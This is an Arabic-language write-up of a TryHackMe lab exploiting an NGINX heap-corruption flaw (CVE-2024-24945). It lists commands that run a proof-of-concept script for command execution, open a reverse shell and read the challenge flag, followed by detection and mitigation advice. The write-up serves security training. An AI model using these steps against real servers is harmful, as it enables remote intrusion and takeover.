
يُظهر هذا المختبر استغلال ثغرة CVE-2024-24945، وهي ثغرة تلف في الكومة (heap corruption) تؤثر على NGINX. كان الهدف هو فهم كيف يمكن أن يؤدي تلف الذاكرة إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) واكتساب خبرة عملية في تقنيات الاستغلال والكشف والتخفيف.
يشرح هذا المختبر استغلال ثغرة CVE-2024-24945، وهي ثغرة تلف في الكومة (heap corruption) تؤثر على NGINX. كان الهدف هو فهم كيف يمكن أن يؤدي تلف الذاكرة إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) واكتساب خبرة عملية في تقنيات الاستغلال والكشف والتخفيف.
. التحقق من خدمة NGINX الضعيفة. . تنفيذ أوامر عشوائية باستخدام إثبات المفهوم (PoC) المقدم. . الحصول على شل عكسي (reverse shell) على الحاوية المستهدفة. . استرداد علم التحدي (flag). . فهم استراتيجيات الكشف والتخفيف.
. المنصة: TryHackMe . الخدمة المستهدفة: NGINX RIFT . البيئة المحتواة: Docker . أداة الاستغلال: poc.py . طريقة الوصول: VNC (الحوسبة الشبكية الافتراضية)
التحقق من الخدمة
تم التأكد من أن الحاوية الضعيفة قيد التشغيل ويمكن الوصول إليها.
sudo docker ps
curl -s http://127.0.0.1:19321/api/users/42
backend ok
تم تنفيذ إثبات المفهوم (PoC) المقدم للتحقق من تنفيذ الأوامر العشوائية.
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned
تم التحقق من التنفيذ الناجح:
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned
المخرجات: hello from depthfirst
إنشاء شل تفاعلي على الحاوية المستهدفة.
python3 poc.py --shell
اتصال ناجح:
[] listening for reverse shell on port 1337... [] connected. $
تم الوصول إلى علم التحدي.
cat /flag.txt
THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}
يمكن للمدافعين تحديد محاولات الاستغلال من خلال:
. تعطل عمليات NGINX العاملة . أحداث خطأ التقسيم (Segmentation fault) . اتصالات شبكة صادرة غير متوقعة . عمليات شل مشبوهة (/bin/sh, bash) . إنشاء ملفات غير مصرح به في الأدلة المؤقتة
. الترقية إلى إصدار NGINX مصحح. . تطبيق مبدأ الحد الأدنى من الامتيازات (least privilege). . تقييد حركة مرور الشبكة الصادرة غير الضرورية. . تنفيذ مراقبة مستمرة للسجلات. . استخدام ضوابط أمان الحاويات ومراقبة وقت التشغيل.
قدم هذا المختبر خبرة عملية في:
. فهم ثغرات تلف الكومة. . استغلال عيوب تنفيذ التعليمات البرمجية عن بُعد. . إنشاء شلات عكسية. . إجراء التحقق بعد الاستغلال. . التعرف على مؤشرات الاختراق وتقنيات التخفيف.
تم تنفيذ هذا التمرين في بيئة مختبر TryHackMe خاضعة للرقابة لأغراض تعليمية ودفاعية في مجال الأمن السيبراني فقط.
المؤلف: [Benedict Ejepu Amaechi] المنصة: TryHackMe الموضوع: CVE-2024-24945 9NGINX RIFT0 الاستغلال والدفاع تاريخ الإكمال: يونيو 2026